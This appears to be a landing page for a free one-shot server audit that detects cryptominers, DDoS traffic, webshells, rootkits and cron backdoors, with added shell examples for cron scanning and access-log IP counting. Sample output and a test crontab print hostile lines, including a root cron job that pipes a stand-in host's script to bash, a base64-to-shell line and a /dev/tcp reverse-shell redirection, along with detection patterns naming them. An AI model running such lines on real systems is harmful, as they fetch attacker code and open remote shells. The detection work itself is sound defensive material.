LYNIS · DDOS DETECTOR · CRYPTOMINER HUNT

Why is your server eating CPU?

One bash one-liner over SSH. We collect top processes, network connections, cron jobs, log tails and recently changed files, run Lynis (200+ hardening checks), and look for known cryptominer signatures and DDoS-rate IPs in your access log. Free. Read-only.

Free · No agent install · Read-only · Single-use 1h token
root@web-01:~#
# step 1 — generate token in browser.uz dashboard
# step 2 — paste this on the server (SSH session):
$ curl -sS 'https://browser.uz/api/audit/agent.sh?t=AUDIT_TOKEN' | bash
[1/9] Host basics … OK
[2/9] CPU & memory snapshot … 🔴 PID 28419 (xmrig) — 98% CPU, running as nobody
[3/9] Network connections … 🟠 listening on :4444 (Metasploit default port)
[4/9] Cron jobs … 🔴 root crontab: */5 * * * * curl x.example.com/r.sh | bash
[5/9] Web access log analysis … 🟠 1.2.3.4 = 4,200 req in last 10k log lines (DDoS-like)
[6/9] Lynis hardening audit … 🟠 hardening_index = 58/100 · 14 warnings · 27 suggestions
[7/9] Recent file changes … 🟡 /etc/passwd modified 3h ago
[8/9] Optional rootkit scan … skipped (not installed)
[9/9] Packing report … ✅ Audit uploaded successfully → browser.uz/<token>/server-audit
What we detect in one run
🔴 Cryptominer
Match against 12 known names: xmrig, kdevtmpfsi, kinsing, kthrotlds, perfctl, etc.
🟠 DDoS pattern
Top 25 IPs in nginx/apache log; flag any >1500 req per 10k lines.
🔴 Suspicious cron
curl|bash, base64-decode, /dev/tcp reverse-shell patterns.
🟠 Backdoor port
Listeners on 4444, 6666, 31337, 1337 — common red-team / Metasploit ports.
🟢 Lynis 200+ checks
SSH config, file permissions, malware traces, ISO27001/PCI-DSS controls.
🟡 Modified /etc
Files like /etc/passwd, /etc/sudoers, sshd_config changed in last 7 days.
🟠 Failed services
systemctl --failed — units that crashed silently.
🟠 Disk & load
Mount >95% full, load avg >4× core count. Servers misbehave fast.
🟢 Rootkit (optional)
If rkhunter or chkrootkit are installed — we run them too.
🔴 DNS-tunnel exfil
MITRE T1071.004 — parses BIND/dnsmasq/systemd-resolved logs. 6 signatures (label len, entropy, TXT abuse, unique subdomain count). 2+ hits → high, 3+ → critical.
🟠 SSH brute-force
MITRE T1110.001 — parses /var/log/auth.log + lastb. ≥50 failed attempts from one IP → high, ≥500 → critical.
🔴 Webshell
MITRE T1505.003 — greps /var/www for PHP/JSP/ASP shell patterns: eval(base64_decode), $_POST → system(), Runtime.exec, classic ASP CreateObject.
🟠 Writable +x in /tmp
MITRE T1059 — executable files in /tmp, /var/tmp, /dev/shm — malware payload staging area. Legitimate software almost never drops binaries here.
🔴 LD_PRELOAD rootkit
MITRE T1574.006 — non-empty /etc/ld.so.preload is virtually always a userland rootkit (Jynx2, Azazel, Diamorphine).
🟡 Suspicious kernel module
MITRE T1547.006 — lsmod against distro allowlist. Names matching diamorphine/reptile/kbeast/azazel/suterusu → critical.
🟠 PROMISC interface
MITRE T1040 — physical NIC in promiscuous mode (not bridge/tap/docker) = sniffer running, post-exploit tooling.
🔴 authorized_keys tamper
MITRE T1098.004 — group/world-writable ~/.ssh/authorized_keys = persistent SSH backdoor. Direct-root keys flagged separately.
🔴 Docker socket exposed
MITRE T1611 — /var/run/docker.sock mode 0777 OR bind-mounted inside container = instant container-to-host root.
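
The suspicious-cron check from the list above, as an added shell example (not the browser.uz agent's code). The three regexes, the `scan_cron` and `make_sample_crontab` names and the crontab contents are assumptions constructed for this example.

```shell
#!/bin/sh
# Added example, not the browser.uz agent: match crontab lines against the
# three pattern families the page names. The regexes are this example's own.

# scan_cron FILE -> "rule<TAB>original line" for every suspicious entry.
# Comment and blank lines are skipped; the first matching rule wins.
scan_cron() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | awk '
        # pad with a space so "sh" at end of line still has a terminator
        { l = $0 " " }
        # download piped straight into a shell (but not into e.g. sha256sum)
        l ~ /(curl|wget)[^|;]*\|[ \t]*(ba|da|z)?sh[ \t;&|]/ { print "pipe-to-shell\t" $0; next }
        # base64 decoding inside a scheduled command
        l ~ /base64[ \t]+(-d|--decode)/ { print "base64-decode\t" $0; next }
        # redirection to the /dev/tcp or /dev/udp pseudo-device
        l ~ /\/dev\/(tcp|udp)\// { print "dev-tcp\t" $0; next }
    '
}

# Constructed sample crontab: two benign jobs and one entry per rule.
make_sample_crontab() {
    cat > "$1" <<'EOF'
# constructed sample crontab
0 3 * * * /usr/local/bin/backup.sh
30 3 * * * curl -fsS https://example.com/pkg.tgz | sha256sum
*/5 * * * * curl x.example.com/r.sh | bash
@reboot echo ZWNobyBoaQ== | base64 -d | sh
* * * * * exec 3<>/dev/tcp/192.0.2.10/4444
EOF
}

tab=$(mktemp)
make_sample_crontab "$tab"
scan_cron "$tab"
rm -f "$tab"
```

The rules are shape-based, so an administrator's own `curl … | bash` job is reported as well; treat hits as items to triage rather than verdicts.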

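The DDoS-pattern rule from the list above (top 25 IPs, flag anything over 1,500 requests per 10k lines) as an added shell example, not the agent's own code. It assumes a common/combined access log with the client IP in the first field; the function names and the sample log are constructed here.

```shell
#!/bin/sh
# Added example, not the browser.uz agent: per-IP request counts over the
# tail of an access log, using the thresholds quoted on the page.
WINDOW=10000     # lines inspected ("per 10k lines")
THRESHOLD=1500   # flag any IP with more than this many requests
TOP_N=25         # report the 25 busiest clients

# top_talkers FILE -> "count ip FLAG|ok", busiest first.
# Assumes the client IP is the first field (common/combined log format).
top_talkers() {
    tail -n "$WINDOW" "$1" |
        awk '{ c[$1]++ } END { for (ip in c) print c[ip], ip }' |
        sort -k1,1nr -k2,2 |
        head -n "$TOP_N" |
        awk -v t="$THRESHOLD" '{ print $1, $2, ($1 > t ? "FLAG" : "ok") }'
}

# flagged_ips FILE -> only the IPs above the threshold, one per line.
flagged_ips() {
    top_talkers "$1" | awk '$3 == "FLAG" { print $2 }'
}

# Constructed sample: 10,000 lines; one client sends 4,000 of them and the
# remaining 6,000 are spread over 120 addresses (50 requests each).
make_sample_log() {
    awk 'BEGIN {
        for (i = 0; i < 10000; i++) {
            if (i % 5 < 2) ip = "203.0.113.7"
            else           ip = "198.51.100." (i % 200 + 1)
            printf "%s - - [01/Jan/2025:00:00:00 +0000] \"GET / HTTP/1.1\" 200 512\n", ip
        }
    }' > "$1"
}

log=$(mktemp)
make_sample_log "$log"
top_talkers "$log" | head -n 3
rm -f "$log"
```

Behind a reverse proxy or CDN the first field is the proxy's address, so every request collapses onto one IP; count the forwarded client address there instead.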
How it works

01. Generate token
Click "Generate one-liner" on /server-audit. Server creates a 1-hour, single-use token tied to your account.

02. SSH and paste
SSH to your server, paste curl -sS '...' | bash. Agent runs locally — read-only. ~30 seconds.

03. Auto-upload
Diagnostic JSON is uploaded back to browser.uz. Agent then deletes itself + working dir.

04. Findings appear
Dashboard shows severity-tagged findings with evidence snippets and ready-to-paste fix commands.

vs Datadog / NewRelic / monitoring agents

| Aspect | Browser Server Audit | Datadog / NewRelic |
|---|---|---|
| Install daemon? | ✗ No | ✓ required |
| Continuous metrics? | ✗ One-shot | ✓ 24/7 stream |
| Cryptominer detector? | ✓ 12 signatures | ✗ no |
| DDoS log analysis? | ✓ Top-IP diff | — add-on |
| Suspicious cron detector? | ✓ regex set | ✗ no |
| Lynis hardening audit? | ✓ 200+ checks | ✗ no |
| DNS-tunnel exfil detector? | ✓ T1071.004, 6 sigs | ✗ no |
| Webshell / SSH brute / rootkit / LD_PRELOAD checks? | ✓ 8 MITRE-mapped engines | ✗ no (separate EDR) |
| Cost | Free | $15-23/host/mo |
| Best for | Discrete security audit | Continuous performance |

🔒 What we never read

Find what's eating your server right now.

One bash one-liner. Free. Read-only. Results in 30 seconds.


Powered by CISOfy/Lynis (GPL-3.0, used as external auditor on your server). Browser does not redistribute Lynis source — the agent script downloads it from upstream GitHub releases at scan time.